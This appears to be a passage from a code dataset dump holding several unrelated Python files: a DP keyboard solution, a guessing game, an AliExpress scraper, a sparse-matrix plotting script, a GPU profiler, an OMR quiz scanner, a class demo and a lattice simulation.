range(26)] # [최소 위치, 최대 위치]\n dp = [[INF for _ in range(26)] for _ in range(N)]\n \n def click(cur:int, dest:int, l:int, r:int) -> int:\n '''\n 이동 비용을 계산: cur -> l -> r -> dest\n '''\n return abs(cur - l) + abs(l - r) + abs(r - dest)\n\n def keyboard(cur:int, alp:int):\n '''\n cur : 현재 위치\n alp : 클릭할 문자 인덱스\n '''\n if alp == 26:\n return 0\n \n if dp[cur][alp] == INF:\n if alp_info[alp]:\n mind, maxd = alp_info[alp]\n\n # 모든 위치를 검사하여 최적의 경로를 찾는다. \n for i in range(N):\n dp[cur][alp] = min(dp[cur][alp], min(click(cur, i, mind, maxd), click(cur, i, maxd, mind)) + keyboard(i, alp+1))\n \n else:\n dp[cur][alp] = keyboard(cur, alp+1)\n\n return dp[cur][alp]\n\n # main\n for i in range(len(S)):\n idx = ctoi(S[i])\n if alp_info[idx]:\n alp_info[idx][1] = i\n else:\n alp_info[idx] = [i, i]\n\n return keyboard(0, 0) + N # N번의 클릭\n\n\nif __name__ == \"__main__\":\n print(solution(*read_data()))\n","repo_name":"HeoSeokYong/AlgorithmStudy","sub_path":"Dynamic_Programming/strange_keyboard.py","file_name":"strange_keyboard.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43957542130","text":"import sys\n\ndef up_and_down():\n import random\n random_num = random.randint(1, 30)\n #정수만 만들거니께 randint\n\n while True:\n user_input = int(sys.stdin.readline())\n if user_input < 1 or user_input > 30:\n raise ValueError(\"원하는 숫자의 범위를 초과\")\n #예외 상황에 대응\n #제대로 입력을 끝까지 받아내겠다는 의지..\n if user_input == random_num:\n print('정답입니다!!!')\n break\n elif user_input > random_num:\n print(\"Down\")\n else:\n print(\"UP\")\n\ntry:\n #예외가 발생하지 않으면 try 블록의 코드 정상적 실행, 예외 발생하면 비정상적으로 종료되는 대신 예외 처리 부분이 처리 됨.\n #일부러 ValueError를 발생시키는데 try문 없으면 이 예외를 처리하지 않고 프로그램이 종료되는 문제가 생김..\n #while문과 함께 사용하여 예외 처리 후에도 while루프가 계속해서 동작할 수 있도록 구성\n #반복적으로 사용자에게 입력을 받아 처리하거나 특정 조건이 충족될 때까지 반복하는 상황에서 유리\n up_and_down()\nexcept Exception as e:\n print(e)","repo_name":"Suhyugyeong/python","sub_path":"python_231120/19_except_raise.py","file_name":"19_except_raise.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11321738523","text":"import requests\nfrom requests_html import HTMLSession\nfrom bs4 import BeautifulSoup\nimport csv\nfrom itertools import zip_longest\nimport pandas as pd\n\ndf=pd.DataFrame(columns=[\n \"Title\",\n \"Price\",\n \"Qty_sold\",\n \"Ranting\",\n \"Shipping\",\n \"Store\"\n])\n\nsession=HTMLSession()\nheaders={\n\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\"\n}\n\n\nurl=\"https://fr.aliexpress.com/?gatewayAdapt=glo2fra\"\n\nresult=session.get(\"https://fr.aliexpress.com/?gatewayAdapt=glo2fra\")\n\nresult.html.render(sleep=2,timeout=20)\ncategories= result.html.find(\"#home-firstscreen > div > div > div.categories-main > div > div > div.categories-list-box > dl.cl-item\")\n\n# print(categories.text)\n# print(list(categories.absolute_links)[0])\n\ncategorie_list=[]\nfor cats in categories:\n categorie_link=list(cats.absolute_links)[0]\n categorie_name=cats.text\n categorie_dict={\n \"name\":categorie_name,\n \"link\":categorie_link\n }\n categorie_list.append(categorie_dict)\n\n#print(categorie_list)\nresult=session.get(categorie_list[0][\"link\"])\nresult.html.render(sleep=4,timeout=20,scrolldown=14)\nproducts=result.html.find(\"#root > div.glosearch-wrap > div > div.main-content > div.right-menu > div > div.JIIxO > a._3t7zg\")\n\n#print(len(products))\nfor product in products:\n try:\n product_title=product.find(\"._18_85\",first=True).text\n product_price= product.find(\".mGXnE\", first=True).text\n quantity_sold=product.find(\"._1kNf9\",first=True).text\n ranting=product.find(\".eXPaM\",first=True).text\n shipping=product.find(\"._2jcMA\",first=True).text\n store=product.find(\".ox0KZ\",first=True).text\n dfnew = pd.DataFrame({\n \"Title\": [product_title],\n \"Price\": [product_price],\n \"Qty_sold\": [quantity_sold],\n \"Ranting\": [ranting],\n \"Shipping\": [shipping],\n \"Store\": [store]\n })\n df=pd.concat([df,dfnew])\n except AttributeError:\n pass\n\n\n\ndf.to_csv(\"aliexpress.csv\")\nprint(df)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#\n#\n# src=result.content\n# #print(src)\n#\n#\n# soup=BeautifulSoup(src,'lxml')\n# #print(soup)\n#\n#\n# link_tag=soup.find_all(\"div\",{\"id\":\"root\"})\n# print(link_tag)\n# # links_url=[]\n# # for i in link_tag:\n# # links_url.append(i.get('href'))\n# # #print(i.get('href'))\n# #\n# # #for i in range(len(links_url)):\n# # result_links=requests.get(links_url[0])\n# # src_links=result_links.content\n# # soup_links=BeautifulSoup(src_links,'lxml')\n# # titles=soup.find_all(\"a\")\n# #\n# # print(links_url)\n# #\n# # print(titles)","repo_name":"zack-dark/ExpressBot","sub_path":"scrapBot.py","file_name":"scrapBot.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"40570786469","text":"import glob\nimport sys\nimport matplotlib.pyplot as plt\nfrom matplotlib.cm import ScalarMappable\n\nimport numpy as np\n\nfrom tools.paper.plotting.plot_utils import plot_save\nfrom tools.paperv2.dlmc.utils import *\n\nfrom matplotlib import rc, rcParams\nfrom tools.paper.plotting.plot_utils import *\nfrom scipy import stats\n\nplt.rcParams[\"font.family\"] = \"Times New Roman\"\nplt.rcParams.update({'font.size': 15})\nplt.rcParams[\"figure.figsize\"] = (6, 4)\nplt.rcParams['axes.xmargin'] = 0\nplt.rcParams['axes.ymargin'] = 0\n\nfig, axs = plt.subplots(1, 4, figsize=(16,3))\n\nidfs = []\nfor bcol in [32, 128, 256, 512]:\n idfs.append(read_cache(\"cascade\", \"all\", bcols=bcol, threads=20))\nidf = pd.concat(idfs)\n\nadfs = []\nfor bcol in [32, 128, 256, 512]:\n adfs.append(read_cache(\"raspberrypi\", \"all\", bcols=bcol, threads=4))\nadf = pd.concat(adfs)\n\nidf[\"Speed-up vs Dense\"] = idf[f\"time median|MKL_Dense\"] / idf[f\"time median|Sp. Reg.\"]\nidf[\"Speed-up vs Sparse\"] = idf[f\"time median|MKL_Sparse\"] / idf[f\"time median|Sp. Reg.\"]\nidf = idf[idf[\"Speed-up vs Dense\"] > 0.0]\nidf = idf[idf[\"Speed-up vs Dense\"] < 10]\nidf = idf[idf[\"Speed-up vs Sparse\"] > 0.0]\nidf = idf[idf[\"Speed-up vs Sparse\"] < 10]\n\nadf[\"Speed-up vs Dense\"] = adf[f\"time median|ARMCL\"] / adf[f\"time median|Sp. Reg.\"]\nadf[\"Speed-up vs Sparse\"] = adf[f\"time median|XNN\"] / adf[f\"time median|Sp. Reg.\"]\nadf = adf[adf[\"Speed-up vs Dense\"] > 0.0]\nadf = adf[adf[\"Speed-up vs Dense\"] < 10]\nidf = idf[idf[\"Speed-up vs Sparse\"] > 0.0]\nidf = idf[idf[\"Speed-up vs Sparse\"] < 10]\n\nadf = adf.sort_values(by=['sparsity'], ascending=True)\nidf = idf.sort_values(by=['sparsity'], ascending=True)\n\nidf = idf[(idf['sparsity'] >= 0.6) & (idf['sparsity'] <= 0.95)]\nadf = adf[(adf['sparsity'] >= 0.6) & (adf['sparsity'] <= 0.95)]\n\nadf['flops'] = adf['gflops'] * 1e9\nidf['flops'] = idf['gflops'] * 1e9\n\nax = axs[0]\nidf.plot(kind='scatter', x='flops', y='Speed-up vs Sparse', c='sparsity', colormap='cividis', alpha=0.5, s=1, ax=ax, colorbar=False)\nax.set_xscale('log')\nax.set_ylim(0, 8)\nax.set_ylabel('Speedup', fontsize=14)\nax.axhline(y=1.0, color='r', linestyle='-')\nax.spines.right.set_visible(False)\nax.spines.top.set_visible(False)\nax.set_title(f'Versus MKL SpMM (CSR)', fontsize=16, pad=15)\nax.set_xlabel('Problem Size (FLOPs)', fontsize=14)\n\nax = axs[1]\nidf.plot(kind='scatter', x='flops', y='Speed-up vs Dense', c='sparsity', colormap='cividis', alpha=0.5, s=1, ax=ax, colorbar=False)\nax.set_xscale('log')\nax.set_ylim(0, 8)\nax.set_ylabel(None)\nax.axhline(y=1.0, color='r', linestyle='-')\nax.spines.right.set_visible(False)\nax.spines.top.set_visible(False)\nax.set_title(f'Versus MKL SGEMM', fontsize=16, pad=15)\nax.set_xlabel('Problem Size (FLOPs)', fontsize=14)\n\nax = axs[2]\nadf.plot(kind='scatter', x='flops', y='Speed-up vs Sparse', c='sparsity', colormap='cividis', alpha=0.5, s=1, ax=ax, colorbar=False)\nax.set_xscale('log')\nax.set_ylim(0, 8)\nax.set_ylabel(None)\nax.axhline(y=1.0, color='r', linestyle='-')\nax.spines.right.set_visible(False)\nax.spines.top.set_visible(False)\nax.set_title(f'Versus XNNPACK', fontsize=16, pad=15)\nax.set_xlabel('Problem Size (FLOPs)', fontsize=14)\n\nax = axs[3]\ns = adf.plot(kind='scatter', x='flops', y='Speed-up vs Dense', c='sparsity', colormap='cividis', alpha=0.5, s=1, ax=ax, colorbar=False)\nax.set_xscale('log')\nax.set_ylim(0, 8)\nax.set_ylabel(None)\nax.axhline(y=1.0, color='r', linestyle='-')\nax.spines.right.set_visible(False)\nax.spines.top.set_visible(False)\nax.set_title(f'Versus ARMCL SGEMM', fontsize=16, pad=15)\nax.set_xlabel('Problem Size (FLOPs)', fontsize=14)\n\n\ncmap = plt.get_cmap(\"cividis\")\nnorm = plt.Normalize(60, 95)\nsm = ScalarMappable(norm=norm, cmap=cmap)\nsm.set_array([])\ncbar = fig.colorbar(sm, ax=axs, pad=0.02)\ncbar.set_label(\"Sparsity\", labelpad=6, y=0.45)\nsavefig(f'figure7.pdf')","repo_name":"SpRegTiling/sparse-register-tiling","sub_path":"tools/paperv2/dlmc/plot_figure7.py","file_name":"plot_figure7.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"28335192353","text":"import coalpy.gpu as g\nimport numpy as nm\nimport math as m\n\nclass Profiler:\n def __init__(self):\n self.m_active = True\n self.m_gpu_queue = []\n self.m_marker_data = []\n self.m_plot_capacity = 200\n self.m_curr_tick = 0\n self.m_gpu_plot_data = nm.zeros((self.m_plot_capacity, 2), dtype='f')\n\n @property\n def active(self):\n return self.m_active\n\n @active.setter\n def active(self, value):\n self.m_active = value\n\n def build_ui(self, imgui : g.ImguiBuilder, implot : g.ImplotBuilder):\n self.m_active = imgui.begin(\"Profiler\", self.m_active)\n if self.m_active and imgui.begin_tab_bar(\"profiler-tab\"):\n if imgui.begin_tab_item(\"Timeline\"):\n self._build_timeline_ui(imgui, implot)\n imgui.end_tab_item()\n if imgui.begin_tab_item(\"Hierarchy\"):\n self._build_hierarchy_ui(imgui)\n imgui.end_tab_item()\n if imgui.begin_tab_item(\"Raw Counters\"):\n self._build_raw_counter_ui(imgui)\n imgui.end_tab_item()\n imgui.end_tab_bar()\n imgui.end()\n\n def _build_raw_counter_ui(self, imgui : g.ImguiBuilder):\n titles = [\"ID\", \"ParentID\", \"Name\", \"Time\", \"BeginTimestamp\", \"EndTimestamp\"]\n imgui.text(f\"{titles[0] : <4} {titles[1] : <8} {titles[2] : <32} {titles[3] : ^10} {titles[4] : ^18} {titles[5] : ^18} \")\n for id in range(0, len(self.m_marker_data)):\n (name, end_timestamp, begin_timestamp, parent_id) = self.m_marker_data[id]\n time = end_timestamp - begin_timestamp\n time_str = \"%.4f ms\" % (time * 1000)\n imgui.text(f\"{id: <4} {parent_id : <8} {name : <32} {time_str : ^10} {begin_timestamp : ^18} {end_timestamp : ^18} \")\n\n def _build_hierarchy_ui(self, imgui : g.ImguiBuilder):\n if len(self.m_marker_data) == 0:\n return\n\n hierarchy = [(id, []) for id in range(0, len(self.m_marker_data))]\n node_stack = []\n for id in range(0, len(self.m_marker_data)):\n (_, _, _, parent_id) = self.m_marker_data[id]\n if parent_id != -1:\n hierarchy[parent_id][1].append(id)\n else:\n node_stack.append((id, False))\n\n node_stack.reverse()\n for (_, l) in hierarchy:\n l.reverse()\n\n while len(node_stack) > 0:\n (id, was_visited) = node_stack.pop()\n if was_visited:\n imgui.tree_pop()\n else:\n (name, timestamp_end, timestamp_begin, _) = self.m_marker_data[id]\n children = hierarchy[id][1]\n flags = (g.ImGuiTreeNodeFlags.Leaf|g.ImGuiTreeNodeFlags.Bullet) if len(children) == 0 else 0\n timestamp_str = \"%.4f ms\" % ((timestamp_end - timestamp_begin) * 1000)\n if imgui.tree_node_with_id(id, f\"{name : <32}{timestamp_str}\", flags):\n node_stack.append((id, True)) #set was_visited to True\n node_stack.extend([(child_id, False) for child_id in children])\n\n def _build_timeline_ui(self, imgui : g.ImguiBuilder, implot : g.ImplotBuilder):\n if implot.begin_plot(\"Timeline\"):\n implot.setup_axes(\"Tick\", \"Time (ms)\", 0, g.ImPlotAxisFlags.AutoFit)\n implot.setup_axis_limits(g.ImAxis.X1, self.m_curr_tick - self.m_plot_capacity, self.m_curr_tick, g.ImPlotCond.Always)\n implot.plot_shaded(\"gpu time\", self.m_gpu_plot_data, self.m_plot_capacity, -float('inf'),(self.m_curr_tick % self.m_plot_capacity))\n implot.end_plot()\n\n def begin_capture(self):\n if not self.active:\n return\n\n g.begin_collect_markers()\n\n def end_capture(self): \n if not self.active:\n return\n\n marker_gpu_data = g.end_collect_markers()\n request = g.ResourceDownloadRequest(marker_gpu_data.timestamp_buffer)\n self.m_gpu_queue.append((marker_gpu_data, request))\n\n if self.m_gpu_queue[0][1].is_ready():\n #extract markers\n (data, req) = self.m_gpu_queue.pop(0)\n gpu_timestamps = nm.frombuffer(req.data_as_bytearray(), dtype=nm.uint64)\n self.m_marker_data = [ (name, gpu_timestamps[ei]/data.timestamp_frequency, gpu_timestamps[bi]/data.timestamp_frequency, pid) for (name, pid, bi, ei) in data.markers]\n\n #process history\n root_tstamps = [(b, e) for (_, e, b, pid) in self.m_marker_data if pid == -1]\n if len(root_tstamps) > 0:\n begin_timestamp = min([t for (t, _) in root_tstamps])\n end_timestamp = max([t for (_, t) in root_tstamps])\n plot_idx = (self.m_curr_tick % self.m_plot_capacity)\n self.m_gpu_plot_data[plot_idx][0] = self.m_curr_tick\n self.m_gpu_plot_data[plot_idx][1] = (end_timestamp - begin_timestamp) * 1000\n self.m_curr_tick = self.m_curr_tick + 1\n \n","repo_name":"kecho/grr","sub_path":"grr/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"76"} +{"seq_id":"5818289039","text":"from imutils import contours , grab_contours , perspective \nfrom imutils.perspective import four_point_transform\nimport numpy as np\nfrom pyzbar import pyzbar\n\nimport pandas as pd\n\ndef shadow_remover(cv2 ,img):\n grayscale_plane = cv2.split(img)[0]\n dilated_img = cv2.dilate(grayscale_plane, np.ones((7, 7), np.uint8))\n bg_img = cv2.medianBlur(dilated_img, 21)\n diff_img = 255 - cv2.absdiff(grayscale_plane, bg_img)\n normalized_img = cv2.normalize(diff_img, None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC1)\n return normalized_img\n\ndef load_answers(quizzpath): \n df = pd.read_excel(quizzpath + \"/quizz.xlsx\") \n ANSWERS={x:df[\"correct\"][x] for x in range(0,10)} \n return ANSWERS\n\ndef get_ordered_answers(code,right_answers,nb_questions):\n order = code.split(' ')\n order = [int(x)-1 for x in order]\n ordered_answers = {}\n for x in range(0,nb_questions):\n ordered_answers[x] = right_answers[order[x]]\n return ordered_answers\n\ndef read_qrcode(cv2, image):\n barcodes = pyzbar.decode(image) \n code = None\n if len(barcodes) >=0:\n for barcode in barcodes: \n (x, y, w, h) = barcode.rect\n code = barcode.data.decode(\"utf-8\") \n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cv2.putText(image, code, (x-200, y + 95), cv2.FONT_HERSHEY_SIMPLEX,0.5, (0, 0, 255), 2)\n return image , code\n\ndef preprocess(cv2 , image , gray , ANSWER_KEY , nb_questions , nb_prop=4):\n questionCnts = [] \n \n font = cv2.FONT_HERSHEY_SIMPLEX \n \n thresh = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY_INV,67,10)\n kernel = np.ones((1,1),np.uint8)\n thresh = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)\n thresh = cv2.dilate(thresh,kernel,iterations = 5)\n #beta test\n \n #beta test end\n cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n cnts = grab_contours(cnts)\n \n \n for c in cnts:\n (x, y, w, h) = cv2.boundingRect(c)\n ar = w / float(h)\n #define size of detected bubbles here\n if w >= 3 and h >= 3 and ar >= 0.9 and ar <= 1.1:\n questionCnts.append(c) \n if len(questionCnts) == nb_questions * nb_prop :\n correct = 0 \n questionCnts = contours.sort_contours(questionCnts,method=\"top-to-bottom\")[0] \n #cv2.imshow('thresh' , thresh)\n print(len(questionCnts))\n try:\n \n for (q, i) in enumerate(np.arange(0, len(questionCnts), nb_prop)):\n cnts = contours.sort_contours(questionCnts[i:i + nb_prop ])[0]\n bubbled = []\n \n for (j, c) in enumerate(cnts): \n mask = np.zeros(thresh.shape, dtype=\"uint8\")\n cv2.drawContours(mask, [c], -1, 255, -1)\n mask = cv2.bitwise_and(thresh, thresh, mask=mask)\n total = cv2.countNonZero(mask) \n #print(total) \n if total > 600: \n bubbled.append((total , j))\n color = (0, 0, 255)\n #print(bubbled) \n k = ANSWER_KEY[q]-1\n if (bubbled !=None):\n #if only one bubble is chosen\n if len(bubbled) == 1: \n if k == bubbled[0][1]:\n color = (0, 255, 0)\n correct += 1\n cv2.drawContours(image, [cnts[k]], -1, color, 3) \n else:\n for y in range(len(cnts)):\n cv2.drawContours(image, [cnts[y]], -1, color, 3) \n #cv2.imshow(\"marked\" , image)\n \n except Exception as E :\n print(E)\n\n return correct , image\n\n\ndef detect_roi(cv2 , org , f , corners , ids):\n result = []\n roi = None\n for i in range(0, len(ids)):\n try:\n marker = np.squeeze(corners[i]) \n x1,y1 = marker[0]\n x2,y2 = marker[2]\n x = int((x1 + x2)/2)\n y = int((y1 + y2)/2) \n result.append((x, y))\n except Exception as E:\n #print(E)\n pass \n \n try: \n edges = np.array(result) \n roi = perspective.four_point_transform(f,edges) \n for point in result:\n x , y = point\n cv2.circle(f , (x,y) , 10 , (0,255,0),-1)\n \n ct = np.array(result).reshape((-1,1,2)).astype(np.int32)\n rect = cv2.minAreaRect(ct)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n cv2.drawContours(f , [box] , 0 , (255,0,0) , 2 )\n \n except Exception as E:\n print(E)\n pass\n return f , roi\n\ndef detect_roi2(cv2 , org , edged , gray) :\n f = org.copy()\n cnts = cv2.findContours(edged, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n cnts = grab_contours(cnts)\n docCnt = None\n \n for c in cnts:\n # approximate the contour\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n\n # if our approximated contour has four points,\n # then we can assume we have found the paper\n if len(approx) == 4 and cv2.contourArea(c) >= 450 :\n docCnt = approx\n break\n\n if len(docCnt) > 0 :\n x , y , w , h = cv2.boundingRect(docCnt) \n cv2.rectangle(f,(x,y),(x+w,y+h),(0,255,0),2)\n warped = four_point_transform(f, docCnt.reshape(4, 2))\n roi_gray = four_point_transform(gray, docCnt.reshape(4, 2))\n \n return f , warped , roi_gray\n\n","repo_name":"gtosama/quizz-scanner","sub_path":"OMRutils.py","file_name":"OMRutils.py","file_ext":"py","file_size_in_byte":5933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26327629071","text":"class Person:\n corporation = \"FC Barcelona 2011\"\n def __init__(self, name, age, stress):\n self.name = name\n self.age = age\n self.stress = stress\n\n def GetStress(self, how_much_stress):\n if how_much_stress > 0:\n self.stress += how_much_stress\n else:\n print(\"No stress. Happy Life!!!\")\n\n def showInfo(self):\n print(\"I am {}, {} years old, and I have {}stress\".format(self.name, self.age, self.stress))\n\nif __name__ == \"__main__\":\n p1 = Person(\"Boss\", 40, 30)\n p2 = Person(\"Employee\", 29, 30)\n\n p1.showInfo()\n p2.showInfo()\n\n p1.GetStress(50)\n\n p1.showInfo()\n p2.showInfo()\n","repo_name":"otakijae/PythonBasicExamples","sub_path":"class_boss/class_person.py","file_name":"class_person.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"8226734809","text":"\"\"\"\nAuthor: Will Hanstedt\nFilename: latticevol.py\nProject: Research for Irina Mazilu, Ph.D.\n\nA file to run large numbers of trials for the lattice type network.\n\"\"\"\n\nimport Cayley as cy\nimport Cayley.graphics as cg\nimport Cayley.research as cr\nimport xlsxwriter as xl\nimport time\nfrom math import sqrt\ntimesteps = cr.variable('timesteps',int)\ninitial_state = cr.variable('initial_state',str)\nnode_list = cr.variable('node_list',list,int)\ntemp_d = cr.variable('temp_d',dict,float)\n\n\ndef simulate(method, model, length, width, height, alpha, beta, gamma, mu, r1, r2,trials,k,J):\n \"\"\"The important one\"\"\"\n length_tag = length\n width_tag = width\n height_tag = height\n if model == 'full':\n length += 2\n width += 2\n height += 2\n elif model == 'flat':\n length += 2\n width += 2\n elif model == 'linear':\n length += 2\n\n network = cy.Lattice(length,width,height)\n monte = cy.MonteCarlo(network, alpha, beta, gamma, mu, r1, r2)\n run_time = time.time()\n endcol = xl.utility.xl_col_to_name(timesteps+1)\n\n a_tag = \"%.2f\" % alpha\n b_tag = \"%.2f\" % beta\n g_tag = \"%.2f\" % gamma\n m_tag = \"%.2f\" % mu\n r1_tag = \"%.2f\" % r1\n r2_tag = \"%.2f\" % r2\n\n\n if method == 'NN':\n name = (\"NN%dx%dx%d_%sα_%sβ_%sγ.xlsx\" % (length_tag, width_tag, height_tag,\n a_tag, b_tag, g_tag))\n tags = a_tag+'-'+b_tag+'-'+g_tag\n elif method == 'TL':\n name = (\"TL%dx%dx%d_%sμ_%sγ.xlsx\" % (length_tag, width_tag, height_tag,\n m_tag, g_tag))\n tags = m_tag+'-'+g_tag\n elif method == 'EI':\n name = (\"EI%dx%dx%d_%sr1_%sr2_%sγ.xlsx\" % (length_tag, width_tag, height_tag,\n r1_tag, r2_tag, g_tag))\n tags = r1_tag+'-'+r2_tag+'-'+g_tag\n elif method == 'TM':\n tag_list = ()\n for s in range(len(temp_d)):\n tag_list += (\"%.2f\"%temp_d[s],)\n tags = (\"%s_\"*(len(temp_d)-1)+\"%s\") %tag_list\n name = (\"TM%dx%dx%d_\"%(length_tag,width_tag,height_tag)+tags+\".xlsx\")\n else: raise ValueError(\"Method not recognized\")\n print(\"\\n#### RUNNING SIMULATION %s ####\\n\"%(name))\n\n workbook = xl.Workbook(name)\n #JKP: This all can be incorporated with new node feature ability\n density_list = dict() #[trial][timestep] stores overall densities\n state_collect = dict() #[trial] stores final state dictionaries\n node_d = dict() #[trial#][pair index][node index][timestep] stores node values\n overtime = workbook.add_worksheet(\"Over_Time\")\n\n for m in range(trials):\n density_list[m] = [0]*(timesteps+2)\n\n for i in range(trials):\n monte.clear()\n if method == 'TM': monte.randomSpins()\n else:\n if initial_state == \"empty\": monte.emptyDictionary()\n elif initial_state == \"random\": monte.randomDictionary()\n\n if method == 'TM':\n iterate = len(temp_d)\n for d in network.getNodes():\n temp = temp_d[d%iterate]\n network.add(d,temperature=temp)\n\n for t in range(timesteps+1):\n if method == 'NN':\n monte.simulateNN()\n elif method == 'EI':\n monte.simulateEI()\n elif method == 'TL':\n monte.simulateTL(t)\n elif method == 'TM':\n monte.simulateTemp()\n\n ### FOR RECORDING DATA ###\n state_collect[i] = monte.simData(monte.getTimesteps()-1) #JKP updated\n\n node_d[i] = list()\n for n in range(len(node_list)):\n node_d[i].append([])\n for f in range(len(node_list[n])):\n node_d[i][n].append([])\n for t in range(timesteps+1):\n if method == 'TM':\n node_d[i][n][f].append((monte.simData(t)[node_list[n][f]]))\n else:\n node_d[i][n][f].append(2*(monte.simData(t)[node_list[n][f]])-1)\n\n for y in range(monte.getTimesteps()): #JKP: Follows new updates\n sum_t = 0 # Sum of relevant nodes at one timestep\n if model == 'full':\n coor_d = network.getNodeFeature('coords')\n for x in network: ## # gives adjusted, can't use len(monte.network)\n if not (0 in coor_d[x] or coor_d[x][0] == length-1 or\\\n coor_d[x][1] == width-1 or coor_d[x][2] == height-1):\n sum_t += monte.simData(y)[x] #JKP: Follows new updates\n elif model == 'flat':\n coor_d = network.getNodeFeature('coords')\n for x in network:\n c = coor_d[x]\n if not (0 in c[0:2] or c[0] == length-1 or c[1] == width-1):\n sum_t += monte.simData(y)[x]\n elif model == 'linear':\n coor_d = network.getNodeFeature('coords')\n for x in network:\n if not(coor_d[x][0] == 0 or coor_d[x][0] == length-1):\n sum_t += monte.simData(y)[x]\n elif model == 'loop':\n for x in network:\n sum_t += monte.simData(y)[x]\n dens_t = sum_t/((length_tag)*(width_tag)*(height_tag)) ## # Density at one timestep\n density_list[i][y] = dens_t\n\n if trials <= 10: # Trial-by-trial is best for small sets\n if model == 'loop':\n worksheet = workbook.add_worksheet(\"Data trial %d\" % (i+1))\n worksheet.write(0,0,\"Timestep\")\n for x in network:## #\n worksheet.write(x+1,0,\"Node \"+str(x))\n for y in range(monte.getTimesteps()): #JKP: Follows new updates\n worksheet.write(0,y+1,str(y))\n for y in range(monte.getTimesteps()): #JKP: Follows new updates\n for x in network:\n worksheet.write(x+1,y+1,monte.simData(y)[x]) #JKP: Follows new updates\n\n if (trials >= 100) and ((10*i)%trials == 0):\n try:\n ti = (time.time()-run_time)\n print(\"Trial: \"+str(i))\n print(str(ti)+\" secs\")\n except NameError: pass\n\n corr_t = dict()\n prod_t = dict() ### Next three dicts are temporary, for diagnosis\n n0_t = dict()\n n1_t = dict()\n for n in range(len(node_list)):\n corr_t[n] = [0]*(timesteps+1)\n prod_t[n] = [0]*(timesteps+1)\n n0_t[n] = [0]*(timesteps+1)\n n1_t[n] = [0]*(timesteps+1)\n for t in range(timesteps+1):\n sum_prod = 0\n n1 = 0\n n2 = 0\n for i in range(trials):\n sum_prod += (node_d[i][n][0][t])*(node_d[i][n][1][t])\n n1 += node_d[i][n][0][t]\n n2 += node_d[i][n][1][t]\n corr_t[n][t] = (sum_prod/trials)-(n1/trials)*(n2/trials)\n prod_t[n][t] = (sum_prod/trials)\n n0_t[n][t] = (n1/trials)\n n1_t[n][t] = (n2/trials)\n\n for n in range(len(node_list)): # For recording correlations\n sheetname = (\"Nodes_%d+%d\" %(node_list[n][0],node_list[n][1]))\n chartrange = '='+sheetname+'!$B$2:$'+endcol+'$2'\n timerange = '='+sheetname+'!$B$2:$'+endcol+'$2'\n corr_sheet = workbook.add_worksheet(sheetname)\n corr_sheet.write(0,0,\"Timestep\")\n corr_sheet.write(1,0,\"Correlation\")\n corr_sheet.write(5,0,\"Product\")\n corr_sheet.write(6,0,\"Node %d\" %(node_list[n][0]))\n corr_sheet.write(7,0,\"Node %d\" %(node_list[n][1]))\n corr_chart = workbook.add_chart({'type':'line'})\n corr_sheet.insert_chart('I8', corr_chart)\n corr_chart.set_title({'name':'Correlation'})\n corr_chart.set_x_axis({'name':'Timesteps'})\n corr_chart.set_y_axis({'name':'Correlation'})\n corr_chart.add_series({'values':chartrange,\n 'name':'Correlation'})\n for t in range(timesteps+1):\n corr_sheet.write(0,t+1,t)\n corr_sheet.write(1,t+1,corr_t[n][t])\n corr_sheet.write(5,t+1,prod_t[n][t])\n corr_sheet.write(6,t+1,n0_t[n][t])\n corr_sheet.write(7,t+1,n1_t[n][t])\n # Average density over time\n overtime.write(0,0,\"Timestep\")\n data_tag = name\n overtime.write(1,0,data_tag)\n chartrange = '=Over_Time!$B$2:$'+endcol+'$2'\n over_chart = workbook.add_chart({'type':'line'})\n overtime.insert_chart('I8',over_chart)\n over_chart.set_title({'name':'Density'})\n over_chart.set_x_axis({'name':'Timesteps'})\n over_chart.set_y_axis({'name':'Density'})\n over_chart.add_series({'values':('=Over_Time!$B$2:$'+endcol+'$2'),\n 'name':'=Over_Time!$A$2'})\n over_chart.add_series({'values':('=Over_Time!$B$3:$'+endcol+'$3'),\n 'name':'=Over_Time!$A$3'})\n over_chart.add_series({'values':('=Over_Time!$B$4:$'+endcol+'$4'),\n 'name':'=Over_Time!$A$4'})\n if trials <= 10:\n for t in range(trials):\n overtime.write(t+5,0,\"Trial \"+str(t+1))\n for m in range(timesteps+1):\n overtime.write(t+5,m+1,density_list[t][m])\n else:\n overtime.write(6,0,\"Trials: \"+str(trials))\n for m in range(timesteps+1):\n t_sum = 0\n overtime.write(0,m+1,m)\n for t in range(trials):\n t_sum += density_list[t][m]\n t_av = t_sum/trials\n overtime.write(1,m+1,t_av)\n\n workbook.close()\n\n\ndef main():\n print(\"To change the default timesteps, initial state, temperatures, or\"+\\\n \" nodes for comparison, change the values in the variables.txt file.\")\n print(\"Enter 'full', 